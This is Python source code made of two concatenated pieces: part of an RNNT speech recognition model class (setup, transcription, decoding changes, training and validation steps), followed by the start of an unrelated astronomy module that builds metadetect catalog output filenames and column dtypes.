self.cfg.joint.jointnet.pred_hidden = self.cfg.model_defaults.pred_hidden
self.decoder = EncDecRNNTModel.from_config_dict(self.cfg.decoder)
self.joint = EncDecRNNTModel.from_config_dict(self.cfg.joint)
# Setup RNNT Loss
loss_name, loss_kwargs = self.extract_rnnt_loss_cfg(self.cfg.get("loss", None))
self.loss = RNNTLoss(
num_classes=self.joint.num_classes_with_blank - 1, loss_name=loss_name, loss_kwargs=loss_kwargs
)
if hasattr(self.cfg, 'spec_augment') and self._cfg.spec_augment is not None:
self.spec_augmentation = EncDecRNNTModel.from_config_dict(self.cfg.spec_augment)
else:
self.spec_augmentation = None
# Setup decoding objects
self.decoding = RNNTDecoding(
decoding_cfg=self.cfg.decoding, decoder=self.decoder, joint=self.joint, vocabulary=self.joint.vocabulary,
)
# Setup WER calculation
self.wer = RNNTWER(
decoding=self.decoding,
batch_dim_index=0,
use_cer=self._cfg.get('use_cer', False),
log_prediction=self._cfg.get('log_prediction', True),
dist_sync_on_step=True,
)
# Whether to compute loss during evaluation
if 'compute_eval_loss' in self.cfg:
self.compute_eval_loss = self.cfg.compute_eval_loss
else:
self.compute_eval_loss = True
# Setup fused Joint step if flag is set
if self.joint.fuse_loss_wer:
self.joint.set_loss(self.loss)
self.joint.set_wer(self.wer)
self.setup_optim_normalization()
def setup_optim_normalization(self):
"""
Helper method to setup normalization of certain parts of the model prior to the optimization step.
Supported pre-optimization normalizations are as follows:
.. code-block:: yaml
# Variation Noise injection
model:
variational_noise:
std: 0.0
start_step: 0
# Joint - Length normalization
model:
normalize_joint_txu: false
# Encoder Network - gradient normalization
model:
normalize_encoder_norm: false
# Decoder / Prediction Network - gradient normalization
model:
normalize_decoder_norm: false
# Joint - gradient normalization
model:
normalize_joint_norm: false
"""
# setting up the variational noise for the decoder
if hasattr(self.cfg, 'variational_noise'):
self._optim_variational_noise_std = self.cfg['variational_noise'].get('std', 0)
self._optim_variational_noise_start = self.cfg['variational_noise'].get('start_step', 0)
else:
self._optim_variational_noise_std = 0
self._optim_variational_noise_start = 0
# Setup normalized gradients for model joint by T x U scaling factor (joint length normalization)
self._optim_normalize_joint_txu = self.cfg.get('normalize_joint_txu', False)
self._optim_normalize_txu = None
# Setup normalized encoder norm for model
self._optim_normalize_encoder_norm = self.cfg.get('normalize_encoder_norm', False)
# Setup normalized decoder norm for model
self._optim_normalize_decoder_norm = self.cfg.get('normalize_decoder_norm', False)
# Setup normalized joint norm for model
self._optim_normalize_joint_norm = self.cfg.get('normalize_joint_norm', False)
def extract_rnnt_loss_cfg(self, cfg: Optional[DictConfig]):
"""
Helper method to extract the rnnt loss name, and potentially its kwargs
to be passed.
Args:
cfg: Should contain `loss_name` as a string which is resolved to a RNNT loss name.
If the default should be used, then `default` can be used.
Optionally, one can pass additional kwargs to the loss function. The subdict
should have a keyname as follows : `{loss_name}_kwargs`.
Note that whichever loss_name is selected, that corresponding kwargs will be
selected. For the "default" case, the "{resolved_default}_kwargs" will be used.
Examples:
.. code-block:: yaml
loss_name: "default"
warprnnt_numba_kwargs:
kwargs2: some_other_val
Returns:
A tuple, the resolved loss name as well as its kwargs (if found).
"""
if cfg is None:
cfg = DictConfig({})
loss_name = cfg.get("loss_name", "default")
if loss_name == "default":
loss_name = resolve_rnnt_default_loss_name()
loss_kwargs = cfg.get(f"{loss_name}_kwargs", None)
logging.info(f"Using RNNT Loss : {loss_name}\n" f"Loss {loss_name}_kwargs: {loss_kwargs}")
return loss_name, loss_kwargs
@torch.no_grad()
def transcribe(
self,
paths2audio_files: List[str],
batch_size: int = 4,
return_hypotheses: bool = False,
partial_hypothesis: Optional[List['Hypothesis']] = None,
) -> (List[str], Optional[List['Hypothesis']]):
"""
Uses greedy decoding to transcribe audio files. Use this method for debugging and prototyping.
Args:
paths2audio_files: (a list) of paths to audio files. \
Recommended length per file is between 5 and 25 seconds. \
But it is possible to pass a few hours long file if enough GPU memory is available.
batch_size: (int) batch size to use during inference. \
Bigger will result in better throughput performance but would use more memory.
return_hypotheses: (bool) Either return hypotheses or text
With hypotheses can do some postprocessing like getting timestamp or rescoring
Returns:
A list of transcriptions in the same order as paths2audio_files. Will also return
"""
if paths2audio_files is None or len(paths2audio_files) == 0:
return {}
# We will store transcriptions here
hypotheses = []
all_hypotheses = []
# Model's mode and device
mode = self.training
device = next(self.parameters()).device
dither_value = self.preprocessor.featurizer.dither
pad_to_value = self.preprocessor.featurizer.pad_to
try:
self.preprocessor.featurizer.dither = 0.0
self.preprocessor.featurizer.pad_to = 0
# Switch model to evaluation mode
self.eval()
# Freeze the encoder and decoder modules
self.encoder.freeze()
self.decoder.freeze()
self.joint.freeze()
logging_level = logging.get_verbosity()
logging.set_verbosity(logging.WARNING)
# Work in tmp directory - will store manifest file there
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'manifest.json'), 'w') as fp:
for audio_file in paths2audio_files:
entry = {'audio_filepath': audio_file, 'duration': 100000, 'text': 'nothing'}
fp.write(json.dumps(entry) + '\n')
config = {'paths2audio_files': paths2audio_files, 'batch_size': batch_size, 'temp_dir': tmpdir}
temporary_datalayer = self._setup_transcribe_dataloader(config)
for test_batch in tqdm(temporary_datalayer, desc="Transcribing"):
encoded, encoded_len = self.forward(
input_signal=test_batch[0].to(device), input_signal_length=test_batch[1].to(device)
)
best_hyp, all_hyp = self.decoding.rnnt_decoder_predictions_tensor(
encoded,
encoded_len,
return_hypotheses=return_hypotheses,
partial_hypotheses=partial_hypothesis,
)
hypotheses += best_hyp
if all_hyp is not None:
all_hypotheses += all_hyp
else:
all_hypotheses += best_hyp
del encoded
del test_batch
finally:
# set mode back to its original value
self.train(mode=mode)
self.preprocessor.featurizer.dither = dither_value
self.preprocessor.featurizer.pad_to = pad_to_value
logging.set_verbosity(logging_level)
if mode is True:
self.encoder.unfreeze()
self.decoder.unfreeze()
self.joint.unfreeze()
return hypotheses, all_hypotheses
def change_vocabulary(self, new_vocabulary: List[str], decoding_cfg: Optional[DictConfig] = None):
"""
Changes vocabulary used during RNNT decoding process. Use this method when fine-tuning a pre-trained model.
This method changes only decoder and leaves encoder and pre-processing modules unchanged. For example, you would
use it if you want to use pretrained encoder when fine-tuning on data in another language, or when you'd need
model to learn capitalization, punctuation and/or special characters.
Args:
new_vocabulary: list with new vocabulary. Must contain at least 2 elements. Typically, \
this is target alphabet.
decoding_cfg: A config for the decoder, which is optional. If the decoding type
needs to be changed (from say Greedy to Beam decoding etc), the config can be passed here.
Returns: None
"""
if self.joint.vocabulary == new_vocabulary:
logging.warning(f"Old {self.joint.vocabulary} and new {new_vocabulary} match. Not changing anything.")
else:
if new_vocabulary is None or len(new_vocabulary) == 0:
raise ValueError(f'New vocabulary must be non-empty list of chars. But I got: {new_vocabulary}')
joint_config = self.joint.to_config_dict()
new_joint_config = copy.deepcopy(joint_config)
new_joint_config['vocabulary'] = new_vocabulary
new_joint_config['num_classes'] = len(new_vocabulary)
del self.joint
self.joint = EncDecRNNTModel.from_config_dict(new_joint_config)
decoder_config = self.decoder.to_config_dict()
new_decoder_config = copy.deepcopy(decoder_config)
new_decoder_config.vocab_size = len(new_vocabulary)
del self.decoder
self.decoder = EncDecRNNTModel.from_config_dict(new_decoder_config)
del self.loss
loss_name, loss_kwargs = self.extract_rnnt_loss_cfg(self.cfg.get('loss', None))
self.loss = RNNTLoss(
num_classes=self.joint.num_classes_with_blank - 1, loss_name=loss_name, loss_kwargs=loss_kwargs
)
if decoding_cfg is None:
# Assume same decoding config as before
decoding_cfg = self.cfg.decoding
self.decoding = RNNTDecoding(
decoding_cfg=decoding_cfg, decoder=self.decoder, joint=self.joint, vocabulary=self.joint.vocabulary,
)
self.wer = RNNTWER(
decoding=self.decoding,
batch_dim_index=self.wer.batch_dim_index,
use_cer=self.wer.use_cer,
log_prediction=self.wer.log_prediction,
dist_sync_on_step=True,
)
# Setup fused Joint step
if self.joint.fuse_loss_wer:
self.joint.set_loss(self.loss)
self.joint.set_wer(self.wer)
# Update config
with open_dict(self.cfg.joint):
self.cfg.joint = new_joint_config
with open_dict(self.cfg.decoder):
self.cfg.decoder = new_decoder_config
with open_dict(self.cfg.decoding):
self.cfg.decoding = decoding_cfg
ds_keys = ['train_ds', 'validation_ds', 'test_ds']
for key in ds_keys:
if key in self.cfg:
with open_dict(self.cfg[key]):
self.cfg[key]['labels'] = OmegaConf.create(new_vocabulary)
logging.info(f"Changed decoder to output to {self.joint.vocabulary} vocabulary.")
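# Hypothetical usage sketch (the character set below is illustrative only; pass the
# full target alphabet for your fine-tuning data):
#
#   new_chars = [" ", "a", "b", "c", "'"]
#   model.change_vocabulary(new_vocabulary=new_chars)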
def change_decoding_strategy(self, decoding_cfg: DictConfig):
"""
Changes decoding strategy used during RNNT decoding process.
Args:
decoding_cfg: A config for the decoder, which is optional. If the decoding type
needs to be changed (from say Greedy to Beam decoding etc), the config can be passed here.
"""
if decoding_cfg is None:
# Assume same decoding config as before
logging.info("No `decoding_cfg` passed when changing decoding strategy, using internal config")
decoding_cfg = self.cfg.decoding
self.decoding = RNNTDecoding(
decoding_cfg=decoding_cfg, decoder=self.decoder, joint=self.joint, vocabulary=self.joint.vocabulary,
)
self.wer = RNNTWER(
decoding=self.decoding,
batch_dim_index=self.wer.batch_dim_index,
use_cer=self.wer.use_cer,
log_prediction=self.wer.log_prediction,
dist_sync_on_step=True,
)
# Setup fused Joint step
if self.joint.fuse_loss_wer:
self.joint.set_loss(self.loss)
self.joint.set_wer(self.wer)
# Update config
with open_dict(self.cfg.decoding):
self.cfg.decoding = decoding_cfg
logging.info(f"Changed decoding strategy to \n{OmegaConf.to_yaml(self.cfg.decoding)}")
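# Hypothetical usage sketch (the exact decoding config keys are assumptions based on
# the structure of `self.cfg.decoding`; not part of the original source):
#
#   decoding_cfg = copy.deepcopy(model.cfg.decoding)
#   with open_dict(decoding_cfg):
#       decoding_cfg.strategy = "beam"       # e.g. switch from greedy to beam search
#       decoding_cfg.beam.beam_size = 4
#   model.change_decoding_strategy(decoding_cfg)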
def _setup_dataloader_from_config(self, config: Optional[Dict]):
if 'augmentor' in config:
augmentor = process_augmentations(config['augmentor'])
else:
augmentor = None
# Automatically inject args from model config to dataloader config
audio_to_text_dataset.inject_dataloader_value_from_model_config(self.cfg, config, key='sample_rate')
audio_to_text_dataset.inject_dataloader_value_from_model_config(self.cfg, config, key='labels')
shuffle = config['shuffle']
device = 'gpu' if torch.cuda.is_available() else 'cpu'
if config.get('use_dali', False):
device_id = self.local_rank if device == 'gpu' else None
dataset = audio_to_text_dataset.get_dali_char_dataset(
config=config,
shuffle=shuffle,
device_id=device_id,
global_rank=self.global_rank,
world_size=self.world_size,
preprocessor_cfg=self._cfg.preprocessor,
)
return dataset
# Instantiate tarred dataset loader or normal dataset loader
if config.get('is_tarred', False):
if ('tarred_audio_filepaths' in config and config['tarred_audio_filepaths'] is None) or (
'manifest_filepath' in config and config['manifest_filepath'] is None
):
logging.warning(
"Could not load dataset as `manifest_filepath` was None or "
f"`tarred_audio_filepaths` is None. Provided config : {config}"
)
return None
shuffle_n = config.get('shuffle_n', 4 * config['batch_size']) if shuffle else 0
dataset = audio_to_text_dataset.get_tarred_dataset(
config=config,
shuffle_n=shuffle_n,
global_rank=self.global_rank,
world_size=self.world_size,
augmentor=augmentor,
)
shuffle = False
else:
if 'manifest_filepath' in config and config['manifest_filepath'] is None:
logging.warning(f"Could not load dataset as `manifest_filepath` was None. Provided config : {config}")
return None
dataset = audio_to_text_dataset.get_char_dataset(config=config, augmentor=augmentor)
if type(dataset) is ChainDataset:
collate_fn = dataset.datasets[0].collate_fn
else:
collate_fn = dataset.collate_fn
return torch.utils.data.DataLoader(
dataset=dataset,
batch_size=config['batch_size'],
collate_fn=collate_fn,
drop_last=config.get('drop_last', False),
shuffle=shuffle,
num_workers=config.get('num_workers', 0),
pin_memory=config.get('pin_memory', False),
)
def setup_training_data(self, train_data_config: Optional[Union[DictConfig, Dict]]):
"""
Sets up the training data loader via a Dict-like object.
Args:
train_data_config: A config that contains the information regarding construction
of an ASR Training dataset.
Supported Datasets:
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text_dali.AudioToCharDALIDataset`
"""
if 'shuffle' not in train_data_config:
train_data_config['shuffle'] = True
# preserve config
self._update_dataset_config(dataset_name='train', config=train_data_config)
self._train_dl = self._setup_dataloader_from_config(config=train_data_config)
# Need to set this because if using an IterableDataset, the length of the dataloader is the total number
# of samples rather than the number of batches, and this messes up the tqdm progress bar.
# So we set the number of steps manually (to the correct number) to fix this.
if 'is_tarred' in train_data_config and train_data_config['is_tarred']:
# We also need to check if limit_train_batches is already set.
# If it's an int, we assume that the user has set it to something sane, i.e. <= # training batches,
# and don't change it. Otherwise, adjust batches accordingly if it's a float (including 1.0).
if isinstance(self._trainer.limit_train_batches, float):
self._trainer.limit_train_batches = int(
self._trainer.limit_train_batches
* ceil((len(self._train_dl.dataset) / self.world_size) / train_data_config['batch_size'])
)
def setup_validation_data(self, val_data_config: Optional[Union[DictConfig, Dict]]):
"""
Sets up the validation data loader via a Dict-like object.
Args:
val_data_config: A config that contains the information regarding construction
of an ASR Validation dataset.
Supported Datasets:
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text_dali.AudioToCharDALIDataset`
"""
if 'shuffle' not in val_data_config:
val_data_config['shuffle'] = False
# preserve config
self._update_dataset_config(dataset_name='validation', config=val_data_config)
self._validation_dl = self._setup_dataloader_from_config(config=val_data_config)
def setup_test_data(self, test_data_config: Optional[Union[DictConfig, Dict]]):
"""
Sets up the test data loader via a Dict-like object.
Args:
test_data_config: A config that contains the information regarding construction
of an ASR Test dataset.
Supported Datasets:
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text_dali.AudioToCharDALIDataset`
"""
if 'shuffle' not in test_data_config:
test_data_config['shuffle'] = False
# preserve config
self._update_dataset_config(dataset_name='test', config=test_data_config)
self._test_dl = self._setup_dataloader_from_config(config=test_data_config)
@property
def input_types(self) -> Optional[Dict[str, NeuralType]]:
if hasattr(self.preprocessor, '_sample_rate'):
input_signal_eltype = AudioSignal(freq=self.preprocessor._sample_rate)
else:
input_signal_eltype = AudioSignal()
return {
"input_signal": NeuralType(('B', 'T'), input_signal_eltype, optional=True),
"input_signal_length": NeuralType(tuple('B'), LengthsType(), optional=True),
"processed_signal": NeuralType(('B', 'D', 'T'), SpectrogramType(), optional=True),
"processed_signal_length": NeuralType(tuple('B'), LengthsType(), optional=True),
}
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
return {
"outputs": NeuralType(('B', 'D', 'T'), AcousticEncodedRepresentation()),
"encoded_lengths": NeuralType(tuple('B'), LengthsType()),
}
@typecheck()
def forward(
self, input_signal=None, input_signal_length=None, processed_signal=None, processed_signal_length=None
):
"""
Forward pass of the model. Note that for RNNT Models, the forward pass of the model is a 3 step process,
and this method only performs the first step - forward of the acoustic model.
Please refer to the `training_step` in order to see the full `forward` step for training - which
performs the forward of the acoustic model, the prediction network and then the joint network.
Finally, it computes the loss and possibly compute the detokenized text via the `decoding` step.
Please refer to the `validation_step` in order to see the full `forward` step for inference - which
performs the forward of the acoustic model, the prediction network and then the joint network.
Finally, it computes the decoded tokens via the `decoding` step and possibly compute the batch metrics.
Args:
input_signal: Tensor that represents a batch of raw audio signals,
of shape [B, T]. T here represents timesteps, with 1 second of audio represented as
`self.sample_rate` number of floating point values.
input_signal_length: Vector of length B, that contains the individual lengths of the audio
sequences.
processed_signal: Tensor that represents a batch of processed audio signals,
of shape (B, D, T) that has undergone processing via some DALI preprocessor.
processed_signal_length: Vector of length B, that contains the individual lengths of the
processed audio sequences.
Returns:
A tuple of 2 elements -
1) The log probabilities tensor of shape [B, T, D].
2) The lengths of the acoustic sequence after propagation through the encoder, of shape [B].
"""
has_input_signal = input_signal is not None and input_signal_length is not None
has_processed_signal = processed_signal is not None and processed_signal_length is not None
if (has_input_signal ^ has_processed_signal) is False:
raise ValueError(
f"{self} Arguments ``input_signal`` and ``input_signal_length`` are mutually exclusive "
" with ``processed_signal`` and ``processed_signal_len`` arguments."
)
if not has_processed_signal:
processed_signal, processed_signal_length = self.preprocessor(
input_signal=input_signal, length=input_signal_length,
)
# Spec augment is not applied during evaluation/testing
if self.spec_augmentation is not None and self.training:
processed_signal = self.spec_augmentation(input_spec=processed_signal, length=processed_signal_length)
encoded, encoded_len = self.encoder(audio_signal=processed_signal, length=processed_signal_length)
return encoded, encoded_len
# PTL-specific methods
def training_step(self, batch, batch_nb):
signal, signal_len, transcript, transcript_len = batch
# forward() only performs encoder forward
if isinstance(batch, DALIOutputs) and batch.has_processed_signal:
encoded, encoded_len = self.forward(processed_signal=signal, processed_signal_length=signal_len)
else:
encoded, encoded_len = self.forward(input_signal=signal, input_signal_length=signal_len)
del signal
# During training, loss must be computed, so decoder forward is necessary
decoder, target_length, states = self.decoder(targets=transcript, target_length=transcript_len)
if hasattr(self, '_trainer') and self._trainer is not None:
log_every_n_steps = self._trainer.log_every_n_steps
sample_id = self._trainer.global_step
else:
log_every_n_steps = 1
sample_id = batch_nb
# If experimental fused Joint-Loss-WER is not used
if not self.joint.fuse_loss_wer:
# Compute full joint and loss
joint = self.joint(encoder_outputs=encoded, decoder_outputs=decoder)
loss_value = self.loss(
log_probs=joint, targets=transcript, input_lengths=encoded_len, target_lengths=target_length
)
tensorboard_logs = {'train_loss': loss_value, 'learning_rate': self._optimizer.param_groups[0]['lr']}
if (sample_id + 1) % log_every_n_steps == 0:
self.wer.update(encoded, encoded_len, transcript, transcript_len)
_, scores, words = self.wer.compute()
self.wer.reset()
tensorboard_logs.update({'training_batch_wer': scores.float() / words})
else:
# If experimental fused Joint-Loss-WER is used
if (sample_id + 1) % log_every_n_steps == 0:
compute_wer = True
else:
compute_wer = False
# Fused joint step
loss_value, wer, _, _ = self.joint(
encoder_outputs=encoded,
decoder_outputs=decoder,
encoder_lengths=encoded_len,
transcripts=transcript,
transcript_lengths=transcript_len,
compute_wer=compute_wer,
)
tensorboard_logs = {'train_loss': loss_value, 'learning_rate': self._optimizer.param_groups[0]['lr']}
if compute_wer:
tensorboard_logs.update({'training_batch_wer': wer})
# Log items
self.log_dict(tensorboard_logs)
# Preserve batch acoustic model T and language model U parameters if normalizing
if self._optim_normalize_joint_txu:
self._optim_normalize_txu = [encoded_len.max(), transcript_len.max()]
return {'loss': loss_value}
def predict_step(self, batch, batch_idx, dataloader_idx=0):
signal, signal_len, transcript, transcript_len, sample_id = batch
# forward() only performs encoder forward
if isinstance(batch, DALIOutputs) and batch.has_processed_signal:
encoded, encoded_len = self.forward(processed_signal=signal, processed_signal_length=signal_len)
else:
encoded, encoded_len = self.forward(input_signal=signal, input_signal_length=signal_len)
del signal
best_hyp_text, all_hyp_text = self.decoding.rnnt_decoder_predictions_tensor(
encoder_output=encoded, encoded_lengths=encoded_len, return_hypotheses=False
)
sample_id = sample_id.cpu().detach().numpy()
return list(zip(sample_id, best_hyp_text))
def validation_step(self, batch, batch_idx, dataloader_idx=0):
signal, signal_len, transcript, transcript_len = batch
# forward() only performs encoder forward
if isinstance(batch, DALIOutputs) and batch.has_processed_signal:
encoded, encoded_len = self.forward(processed_signal=signal, processed_signal_length=signal_len)
else:
encoded, encoded_len = self.forward(input_signal=signal, input_signal_length=signal_len)
del signal
tensorboard_logs = {}
# If experimental fused Joint-Loss-WER is not used
if not self.joint.fuse_loss_wer:
if self.compute_eval_loss:
decoder, target_length, states = self.decoder(targets=transcript, target_length=transcript_len)
joint = self.joint(encoder_outputs=encoded, decoder_outputs=decoder)
loss_value = self.loss(
log_probs=joint, targets=transcript, input_lengths=encoded_len, target_lengths=target_length
)
tensorboard_logs['val_loss'] = loss_value
self.wer.update(encoded, encoded_len, transcript, transcript_len)
wer, wer_num, wer_denom = self.wer.compute()
self.wer.reset()
tensorboard_logs['val_wer_num'] = wer_num
tensorboard_logs['val_wer_denom'] = wer_denom
tensorboard_logs['val_wer'] = wer
else:
# If experimental fused Joint-Loss-WER is used
compute_wer = True
if self.compute_eval_loss:
decoded, target_len, states = self.decoder(targets=transcript, target_length=transcript_len)
else:
decoded = None
target_len = transcript_len
# Fused joint step
loss_value, wer, wer_num, wer_denom = self.joint(
encoder_outputs=encoded,
decoder_outputs=decoded,
encoder_lengths=encoded_len,
transcripts=transcript,
transcript_lengths=target_len,
compute_wer=compute_wer,
)
if loss_value is not None:
tensorboard_logs['val_loss'] = loss_value
tensorboard_logs['val_wer_num'] = wer_num
tensorboard_logs['val_wer_denom'] = wer_denom
tensorboard_logs['val_wer'] = wer
return tensorboard_logs
def test_step(self, batch, batch_idx, dataloader_idx=0):
logs = self.validation_step(batch, batch_idx, dataloader_idx=dataloader_idx)
test_logs = {
'test_wer_num': logs['val_wer_num'],
'test_wer_denom': logs['val_wer_denom'],
# 'test_wer': logs['val_wer'],
}
if 'val_loss' in logs:
test_logs['test_loss'] = logs['val_loss']
return test_logs
def multi_validation_epoch_end(self, outputs, dataloader_idx: int = 0):
if self.compute_eval_loss:
val_loss_mean = torch.stack([x['val_loss'] for x in outputs]).mean()
val_loss_log = {'val_loss': val_loss_mean}
else:
val_loss_log = {}
wer_num = torch.stack([x['val_wer_num'] for x in outputs]).sum()
wer_denom = torch.stack([x['val_wer_denom'] for x in outputs]).sum()
tensorboard_logs = {**val_loss_log, 'val_wer': wer_num.float() / wer_denom}
return {**val_loss_log, 'log': tensorboard_logs}
def multi_test_epoch_end(self, outputs, dataloader_idx: int = 0):
if self.compute_eval_loss:
test_loss_mean = torch.stack([x['test_loss'] for x in outputs]).mean()
test_loss_log = {'test_loss': test_loss_mean}
else:
test_loss_log = {}
wer_num = torch.stack([x['test_wer_num'] for x in outputs]).sum()
wer_denom = torch.stack([x['test_wer_denom'] for x in outputs]).sum()
tensorboard_logs = {**test_loss_log, 'test_wer': wer_num.float() / wer_denom}
return {**test_loss_log, 'log': tensorboard_logs}
def _setup_transcribe_dataloader(self, config: Dict) -> 'torch.utils.data.DataLoader':
"""
Setup function for a temporary data loader which wraps the provided audio file.
Args:
config: A python dictionary which contains the following keys:
paths2audio_files: (a list) of paths to audio files. The files should be relatively short fragments. \
Recommended length per file is between 5 and 25 seconds.
batch_size: (int) batch size to use during inference. \
Bigger will result in better throughput performance but would use more memory.
temp_dir: (str) A temporary directory where the audio manifest is temporarily
stored.
Returns:
A pytorch DataLoader for the given audio file(s).
"""
batch_size = min(config['batch_size'], len(config['paths2audio_files']))
dl_config = {
'manifest_filepath': os.path.join(config['temp_dir'], 'manifest.json'),
'sample_rate': self.preprocessor._sample_rate,
'labels': self.joint.vocabulary,
'batch_size': batch_size,
'trim_silence': False,
'shuffle': False,
'num_workers': min(batch_size, os.cpu_count() - 1),
'pin_memory': True,
}
temporary_datalayer = self._setup_dataloader_from_config(config=DictConfig(dl_config))
return temporary_datalayer
def on_after_backward(self):
super().on_after_backward()
if self._optim_variational_noise_std > 0 and self.global_step >= self._optim_variational_noise_start:
for param_name, param in self.decoder.named_parameters():
if param.grad is not None:
noise = torch.normal(
mean=0.0,
std=self._optim_variational_noise_std,
size=param.size(),
device=param.device,
dtype=param.dtype,
)
param.grad.data.add_(noise)
if self._optim_normalize_joint_txu:
T, U = self._optim_normalize_txu
if T is not None and U is not None:
for param_name, param in self.encoder.named_parameters():
if param.grad is not None:
param.grad.data.div_(U)
for param_name, param in self.decoder.named_parameters():
if param.grad is not None:
param.grad.data.div_(T)
if self._optim_normalize_encoder_norm:
for param_name, param in self.encoder.named_parameters():
if param.grad is not None:
norm = param.grad.norm()
param.grad.data.div_(norm)
if self._optim_normalize_decoder_norm:
for param_name, param in self.decoder.named_parameters():
if param.grad is not None:
norm = param.grad.norm()
param.grad.data.div_(norm)
if self._optim_normalize_joint_norm:
for param_name, param in self.joint.named_parameters():
if param.grad is not None:
norm = param.grad.norm()
param.grad.data.div_(norm)
|
the-stack_106_30612 | import os
import json
import time
import datetime
import logging
import subprocess
import yaml
import joblib
import numpy as np
import esutil as eu
import fitsio
import ngmix
import healpy as hp
from esutil.pbar import PBar
from metadetect.metadetect import do_metadetect
from metadetect.masking import apply_apodization_corrections
from pizza_cutter.files import expandpath
from pizza_cutter.des_pizza_cutter import BMASK_SLICE_APODIZED
from .gaia_stars import (
load_gaia_stars, mask_gaia_stars, BMASK_GAIA_STAR, BMASK_EXPAND_GAIA_STAR,
)
from .masks import (
make_mask, get_slice_bounds, in_unique_coadd_tile_region,
MASK_TILEDUPE, MASK_SLICEDUPE, MASK_GAIA_STAR,
MASK_NOSLICE, MASK_MISSING_BAND, MASK_MISSING_NOSHEAR_DET,
MASK_MISSING_BAND_PREPROC, MASK_MISSING_MDET_RES,
MASK_MDET_FAILED,
)
from pizza_cutter.des_pizza_cutter import get_coaddtile_geom
LOGGER = logging.getLogger(__name__)
def split_range(meds_range):
"""
Parameters
----------
meds_range: str
e.g. '3:7' is like a python slice
Returns
-------
start, end_plus_one, num
Start index, end+1 from the slice, and number to process
"""
start, end_plus_one = meds_range.split(':')
start = int(start)
end_plus_one = int(end_plus_one)
num = end_plus_one - start # last element is the end of the range + 1
return start, end_plus_one, num
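# Worked example: split_range('3:7') returns (3, 7, 4), i.e. start=3,
# end_plus_one=7, and 4 entries to process.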
def make_output_filename(directory, config_fname, meds_fname, part, meds_range):
"""
make the output name
Parameters
----------
directory: str
The directory for the outputs.
config_fname: str
The config file name.
meds_fname: str
Example meds file name
part: int
The part of the file processed
meds_range: str
The slice to process, as as string, e.g. '3:7'
Returns
-------
file basename
"""
mdetrun = os.path.basename(config_fname)
if mdetrun.endswith(".yaml") or mdetrun.endswith(".yml"):
mdetrun = mdetrun.rsplit(".", 1)[0]
fname = os.path.basename(meds_fname)
fname = fname.replace('.fz', '').replace('.fits', '')
items = fname.split('_')
# keep real DES data names short. By convention, the first part
# is the tilename
parts = [items[0], mdetrun, "mdetcat"]
if part is None and meds_range is None:
part = 0
if part is not None:
tail = 'part%04d.fits.fz' % part
else:
start, end_plus_one, num = split_range(meds_range)
end = end_plus_one - 1
tail = 'range%04d-%04d.fits.fz' % (start, end)
parts.append(tail)
fname = '_'.join(parts)
fname = os.path.join(directory, fname)
fname = expandpath(fname)
return fname
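# Worked example (tile and config names are illustrative): with directory='/out',
# config_fname='mdet-v1.yaml', meds_fname='DES0131-3206_r_pizza-slices.fits.fz',
# part=None and meds_range=None, `part` defaults to 0 and the result is
# '/out/DES0131-3206_mdet-v1_mdetcat_part0000.fits.fz'.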
def _make_output_dtype(*, nbands, filename_len, tilename_len, band_names):
new_dt = [
('slice_id', 'i8'),
('mdet_step', 'U7'),
('ra', 'f8'),
('dec', 'f8'),
('ra_noshear', 'f8'),
('dec_noshear', 'f8'),
('y_noshear', 'f8'),
('x_noshear', 'f8'),
('y', 'f8'),
('x', 'f8'),
('slice_y', 'f8'),
('slice_x', 'f8'),
('slice_y_noshear', 'f8'),
('slice_x_noshear', 'f8'),
('hpix_16384', 'i8'),
('hpix_16384_noshear', 'i8'),
('filename', 'U%d' % filename_len),
('tilename', 'U%d' % tilename_len),
# columns from mdet
# we flatten shears and matrices
("flags", 'i4'),
('psf_flags', 'i4'),
('psf_g_1', 'f8'),
('psf_g_2', 'f8'),
('psf_T', 'f8'),
("mdet_flags", 'i4'),
("mdet_s2n", "f8"),
("mdet_g_1", "f8"),
("mdet_g_2", "f8"),
("mdet_g_cov_1_1", "f8"),
("mdet_g_cov_1_2", "f8"),
("mdet_g_cov_2_2", "f8"),
("mdet_T", "f8"),
("mdet_T_err", "f8"),
("mdet_T_ratio", "f8"),
('ormask', 'i4'),
('mfrac', 'f4'),
('bmask', 'i4'),
('mask_flags', 'i4'),
('ormask_noshear', 'i4'),
('mfrac_noshear', 'f4'),
('bmask_noshear', 'i4'),
('mask_flags_noshear', 'i4'),
# this is the original PSF
('psfrec_flags', 'i4'),
('psfrec_g_1', 'f8'),
('psfrec_g_2', 'f8'),
('psfrec_T', 'f8'),
]
new_dt += [
("mdet_flux_flags", 'i4'),
]
if band_names is not None:
new_dt += [
("mdet_%s_flux" % b, "f8")
for b in band_names
]
new_dt += [
("mdet_%s_flux_err" % b, "f8")
for b in band_names
]
new_dt += [
("nepoch_%s" % b, "i4")
for b in band_names
]
new_dt += [
("nepoch_eff_%s" % b, "i4")
for b in band_names
]
else:
if nbands > 1:
new_dt += [
("mdet_flux", "f8", nbands),
("mdet_flux_err", "f8", nbands),
("nepoch", "i4", nbands),
("nepoch_eff", "i4", nbands),
]
else:
new_dt += [
("mdet_flux", "f8"),
("mdet_flux_err", "f8"),
("nepoch", "i4"),
("nepoch_eff", "i4"),
]
return new_dt
def _reorder_band_fluxes(model, data, bandinds):
if len(bandinds) > 1:
mpre = model + "_"
for col in ["band_flux", "band_flux_err"]:
old_fluxes = data[mpre+col].copy()
for iold, inew in enumerate(bandinds):
data[mpre+col][:, inew] = old_fluxes[:, iold]
return data
